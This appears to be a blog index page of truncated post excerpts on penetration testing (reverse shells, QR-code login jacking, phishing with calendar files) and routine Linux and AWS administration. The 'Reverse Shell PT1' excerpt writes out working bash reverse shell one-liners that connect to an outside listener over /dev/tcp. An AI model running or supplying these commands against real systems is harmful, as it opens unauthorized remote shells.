Reverse Shell PT2
In a traditional client-server environment, the user is the client and the machine that provides services is the…
Reverse Shell PT1
Tools Reverse Shell Bash TCP bash -i >& /dev/tcp/10.0.0.1/4242 0>&1 0<&196;exec 196<>/dev/tcp/10.0.0.1/4242; sh <&196 >&196 2>&196 /bin/bash -l…
The Perfect $100 System
The Pi 400 makes creating a hacking system with Raspberry Pi extremely simple – it is literally burn,…
QR Code Login Feature or Bug
Overview QRLJacking or Quick Response Code Login Jacking is a simple social engineering attack vector capable of session…
Initial Access with Evil Calendar Files
Crafting the E-Mail The first thing we need to do is craft a Social Engineering e-mail to entice…
Increasing Root Volume Size of an EBS Backed EC2
When you launch an Amazon EC2 instance, you define an Amazon EBS volume size. However, you may eventually…
Give Root Privileges to a User
The sudo command is the most powerful command in Linux. It provides a mechanism for granting administrator privileges, using administrator privileges…
Removing Data From ElasticSearch
cURL or visually using one of the many tools that open source enthusiasts have created for Elasticsearch. Using cURL…
How can I create a new user but with a home directory that already exists
You did create a user with a home directory that already exists. adduser: warning: the home directory already…
Mounting a NVME disk on AWS EC2
I have been using “c5” type instances since almost a month, mostly “c5d.4xlarge” with nvme drives. So, here’s…